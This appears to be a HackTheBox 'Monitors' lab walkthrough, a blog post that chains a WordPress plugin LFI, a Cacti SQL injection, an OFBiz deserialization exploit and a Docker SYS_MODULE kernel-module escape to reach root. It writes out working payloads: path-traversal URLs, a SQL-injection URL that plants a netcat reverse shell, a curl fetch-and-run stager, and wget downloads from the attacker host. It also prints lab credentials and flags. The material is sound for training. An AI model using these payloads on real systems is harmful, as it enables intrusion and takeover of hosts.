Posts Hackthebox Monitors writeup
Post
Cancel

Hackthebox Monitors writeup

Introduction@Monitors:~$

Column Details
Name Monitors
IP 10.10.10.238
Points 40
Os Linux
Difficulty Hard
Creator TheCyberGeek
Out On 24 Apr 2021

Pwned

Recon

Nmap

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.10.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-24 23:41 CDT
Nmap scan report for 10.10.10.238
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.76 seconds

Let's start with port-80

Port-80

There is a simple html page that said direct IP is not allowed.

Port-80

Let's add monitors.htb inside /etc/hosts file.

127.0.0.1       localhost
127.0.1.1       parrot

#custom
10.10.10.238    monitors.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let's go to monitors.htb now.

Monitors.htb

Wordpress is running on the server let's run wpscan for find some users and vulnerabilities in plugin-ins.

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ wpscan --url http://monitors.htb/ -e ap,t,u

Monitors.htb

Let's search on google for exploit for this plugin-in.

Monitors.htb

Found a LFI.

Link : WordPress Plugin WP with Spritz 1.0
Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Let's go to this url and check this is vulnerable through LFI or not.

Monitors.htb

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
\_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false

Now we known we can list the files so let's get the wp-config.php.

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php

Monitors.htb

/\*\* MySQL database username \*/
define( 'DB\_USER', 'wpadmin' );
/\*\* MySQL database password \*/
define( 'DB\_PASSWORD', 'BestAdministrator@2020!' );
/\*\* MySQL hostname \*/
define( 'DB\_HOST', 'localhost' );
/\*\* Database Charset to use in creating database tables. \*/
define( 'DB\_CHARSET', 'utf8mb4' );
/\*\* The Database Collate type. Don't change this if in doubt. \*/
define( 'DB\_COLLATE', '' );

Got the username and password now let's try to login with this creads.

Monitors.htb

We can't login with these creads. Now let's try to get /var/log/apache2/access.log.

But we don't have permission to list the access.log.

After that i found an another way to list the access.log.

Link : LFI to RCE

After reading,the article I came to know that “/proc/self/fd” provides symbolic shortcut to access-logs and various other system related file. So I tried reading those in search for access logs-

I use burp for that.

Capture the req and send it to intruder.

Burp

Add the position.

Burp

Select payload type to numbers from 1 to 15 and start the attack.

Burp

Check the maximum lenght on 10 payload.

Burp

Now we list the access.log file let's open this in browser.

Burp

After analyze the file we see that a new vhost.

Monitors.htb

Let's check the /etc/apache2/sites-available/000-default.conf file for conform that.

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf"
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

<VirtualHost \*:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com  

ServerAdmin admin@monitors.htb
DocumentRoot /var/www/html
Redirect 403 /
ErrorDocument 403 "Sorry, direct IP access is not allowed. If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
UseCanonicalName Off
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.

#LogLevel info ssl:warn

ErrorLog ${APACHE\_LOG\_DIR}/error.log
CustomLog ${APACHE\_LOG\_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

Found a new vhost called cacti-admin.monitors.htb.

Let's add this in /etc/hosts file.

127.0.0.1       localhost
127.0.1.1       parrot

#custom
10.10.10.238    cacti-admin.monitors.htb monitors.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let's go to cacti-admin.monitors.htb.

Got the login page let's login with wordpress creads which we find in wp-config.php.

Username : admin
Password : BestAdministrator@2020!

Monitors.htb

We got login succesfully and we are inside cacti admin panel let's check the cacti version.

Monitors.htb

version : 1.2.12

Monitors.htb

Let's check on google for some exploit for that specific version.

Monitors.htb

Find a github issue.

Link : CVE-2020-14295

There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.

And the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database.

Let's try this to get rev shell.

http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.15+9001+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-

Hit this rev shell and you got a file leave this file and hit the second url.

Monitors.htb

Before hit the second url start your netcat listner on 9001.

http://cacti-admin.monitors.htb/cacti/host.php?action=reindex

The page is reloading. let's check the netcat listner.

Monitors.htb

Got the reverse shell as www-data.

Monitors.htb

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ nc -nvlp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.238.
Ncat: Connection from 10.10.10.238:56608.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ ^Z
[1]+  Stopped                 nc -nvlp 9001
┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ stty raw -echo
┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
nc -nvlp 9001

$ bash
www-data@monitors:/usr/share/cacti/cacti$ whoami
www-data
www-data@monitors:/usr/share/cacti/cacti$

Now we need marcus user access so i use grep command to searching string "marcus" related file on every directory.

I found an interesting file called cacti-backup.service.

It's point us to /home/marcus/.backup/backup.sh and when we cat that file we found the password for marcus.

Monitors.htb

www-data@monitors:/$ grep 'marcus' /etc -R 2>/dev/null
/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
www-data@monitors:/$ cd /etc/systemd/system
www-data@monitors:/etc/systemd/system$ ls
cacti-backup.service                   network-online.target.wants
cloud-final.service.wants              open-vm-tools.service.requires
cloud-init.target.wants                paths.target.wants
dbus-org.freedesktop.resolve1.service  snap-core-10583.mount
dbus-org.freedesktop.thermald.service  snap-core-10958.mount
default.target.wants                   sockets.target.wants
final.target.wants                     sshd.service
getty.target.wants                     sysinit.target.wants
graphical.target.wants                 syslog.service
iscsi.service                          timers.target.wants
mariadb.service.d                      vmtoolsd.service
multi-user.target.wants
www-data@monitors:/etc/systemd/system$ cat cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target

[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh

[Install]
WantedBy=multi-user.target
www-data@monitors:/etc/systemd/system$ cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
www-data@monitors:/etc/systemd/system$

Let's login with marcus with ssh and get our user.txt file.

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ ssh marcus@10.10.10.238
The authenticity of host '10.10.10.238 (10.10.10.238)' can't be established.
ECDSA key fingerprint is SHA256:qcinAnoUyOFIv8VZ0yXCnFRNmzc6Zghh1VbQQD43abI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.238' (ECDSA) to the list of known hosts.
marcus@10.10.10.238's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Apr 26 12:51:33 UTC 2021

  System load:  0.08               Users logged in:                1
  Usage of /:   35.1% of 17.59GB   IP address for ens160:          10.10.10.238
  Memory usage: 42%                IP address for docker0:         172.17.0.1
  Swap usage:   0%                 IP address for br-968a1c1855aa: 172.18.0.1
  Processes:    195

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

2 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Apr 26 12:42:03 2021 from 10.10.14.63
marcus@monitors:~$ cat user.txt 
27991d56c000913c2e2a365e88add8f8
marcus@monitors:~$ 

Privilege escalation

let's check services running on server.

marcus@monitors:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 10.10.10.238:56608      10.10.14.15:9001        ESTABLISHED
tcp        0      0 10.10.10.238:22         10.10.14.63:57030       ESTABLISHED
tcp        0     36 10.10.10.238:22         10.10.14.15:59822       ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       1      0 10.10.10.238:80         10.10.14.15:55164       CLOSE_WAIT 
marcus@monitors:~$ 

We find a interesting port called 8443. let's check on google for this service.

Monitors.htb

It's a https port let's forward the port becuase it's running locally we can't access it directly.

┌───[us-free-1]─[10.10.14.15]─[root@parrot]─[~/Desktop/HTB/Monitors]
└──╼ [★]$ ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238
marcus@10.10.10.238's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Apr 26 12:57:50 UTC 2021

  System load:  0.16               Users logged in:                1
  Usage of /:   35.1% of 17.59GB   IP address for ens160:          10.10.10.238
  Memory usage: 42%                IP address for docker0:         172.17.0.1
  Swap usage:   0%                 IP address for br-968a1c1855aa: 172.18.0.1
  Processes:    193

  => There is 1 zombie process.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

2 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Apr 26 12:56:28 2021 from 10.10.10.238
marcus@monitors:~$ 

Now let's check on browser what service running on the web.

Monitors.htb

It's running Apache Tomcat/9.0.31. let's check on google for some exploit.

Link : Apache OFBiz XML-RPC Java Deserialization

Now let's run the msfconsole and configure that.

msf6 > use exploit/linux/http/apache_ofbiz_deserialization       
[*] Using configured payload linux/x64/meterpreter_reverse_https                               
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.17
lhost => tun0
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

[*] Started reverse TCP handler on 10.10.14.17:9001 
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x64/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/IKFGxXVgox
[*] Local IP: http://192.168.29.165:8080/IKFGxXVgox
[+] Successfully executed command: curl -so /tmp/iTyEaDor http://10.10.14.17:8080/IKFGxXVgox;chmod +x /tmp/iTyEaDor;/tmp/iTyEaDor;rm -f /tmp/iTyEaDor
[*] Client 10.10.10.238 (curl/7.64.0) requested /IKFGxXVgox
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Sending stage (38 bytes) to 10.10.10.238
[*] Command shell session 3 opened (10.10.14.17:9001 -> 10.10.10.238:60818) at 2021-04-26 22:11:19 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty; pty.spawn("/bin/sh")'     
# bash
bash
root@99e8ea6b68fd:/usr/src/apache-ofbiz-17.12.01# 

We are root but in the docker container.

Now let's run linpeas.

Monitors.htb

Let's check on google for Abusing capability.

Link : Docker Container Breakout: Abusing SYS_MODULE capability!

Checking the capabilities provided to the docker container

root@99e8ea6b68fd:/root# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
root@99e8ea6b68fd:/root# 

Let's check the ip of docker0 interface inside marcus ssh shell.

marcus@monitors:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:6f:cc brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.238/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6fcc/64 scope global dynamic mngtmpaddr 
       valid_lft 85965sec preferred_lft 13965sec
    inet6 fe80::250:56ff:feb9:6fcc/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:f7:2f:25:89 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:f7ff:fe2f:2589/64 scope link 
       valid_lft forever preferred_lft forever
4: br-968a1c1855aa: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:c6:06:0e:35 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-968a1c1855aa
       valid_lft forever preferred_lft forever
6: veth6b93f31@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether 8a:37:c7:a2:10:58 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::8837:c7ff:fea2:1058/64 scope link 
       valid_lft forever preferred_lft forever
marcus@monitors:~$  

Now we need to create two files
1 -> reverse-shell.c
2 -> Makefile

Just unzip and you got these two files

Link : Exploits.zip

Now in docker root shell on /root directory wget the two files inside /root directory.

Monitors.htb

root@cfebe933d186:/root# pwd
pwd
/root
root@cfebe933d186:/root# wget http://10.10.14.47/reverse-shell.c
wget http://10.10.14.47/reverse-shell.c
--2021-04-28 11:30:25--  http://10.10.14.47/reverse-shell.c
Connecting to 10.10.14.47:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 616 [text/x-csrc]
Saving to: 'reverse-shell.c'

reverse-shell.c     100%[===================>]     616  --.-KB/s    in 0s

2021-04-28 11:30:25 (57.4 MB/s) - 'reverse-shell.c' saved [616/616]

root@cfebe933d186:/root# wget http://10.10.14.47/Makefile
wget http://10.10.14.47/Makefile
--2021-04-28 11:30:38--  http://10.10.14.47/Makefile
Connecting to 10.10.14.47:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/octet-stream]
Saving to: 'Makefile'

Makefile            100%[===================>]     166  --.-KB/s    in 0s

2021-04-28 11:30:38 (17.2 MB/s) - 'Makefile' saved [166/166]

root@cfebe933d186:/root# ls
ls
Makefile  reverse-shell.c
root@cfebe933d186:/root# 

Now export the path and compile the program and you got so many files but we need only reverse-shell.ko

Monitors.htb

root@cfebe933d186:/root# ls
ls
Makefile  reverse-shell.c
root@cfebe933d186:/root# export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
root@cfebe933d186:/root# make clean
make clean
make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@cfebe933d186:/root# make all
make all
make -C /lib/modules/4.15.0-142-generic/build M=/root modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /root/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/reverse-shell.mod.o
  LD [M]  /root/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@cfebe933d186:/root# ls
ls
Makefile        modules.order    reverse-shell.ko     reverse-shell.mod.o
Module.symvers  reverse-shell.c  reverse-shell.mod.c  reverse-shell.o
root@cfebe933d186:/root# 

Before insert the kernel module start your netcat listner on marcus ssh shell.

marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)

Now let's insert the kernel module using insmod.

Monitors.htb

root@cfebe933d186:/root# ls
ls
Makefile        modules.order    reverse-shell.ko     reverse-shell.mod.o
Module.symvers  reverse-shell.c  reverse-shell.mod.c  reverse-shell.o
root@cfebe933d186:/root# insmod reverse-shell.ko
insmod reverse-shell.ko
root@cfebe933d186:/root# 

Now let's check our netcat listner.

Monitors.htb

marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)
Connection from 10.10.10.238 58598 received!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# pwd
pwd
/
root@monitors:/# cat root.txt
cat root.txt
cat: root.txt: No such file or directory
root@monitors:/# cat /root/root.txt
cat /root/root.txt
a9da7d48445695acc340348beaeb8c38
root@monitors:/# 

And we pwned it …….

Complete

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
WordPress Plugin WP with Spritz 1.0 https://www.exploit-db.com/exploits/44544
LFI to RCE https://infosecwriteups.com/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899
CVE-2020-14295 https://github.com/Cacti/cacti/issues/3622
Apache OFBiz XML-RPC Java Deserialization https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialization/
Abusing SYS_MODULE capability https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
Exploits.zip https://drive.google.com/file/d/1tsXdUggLFs1cWGTUt8ccWVQ4cKutT3Vj/view
This post is licensed under CC BY 4.0

Hackthebox Jewel writeup

Fortress Reel2 writeup

© 2020 Dedinfosec . All rights reserved.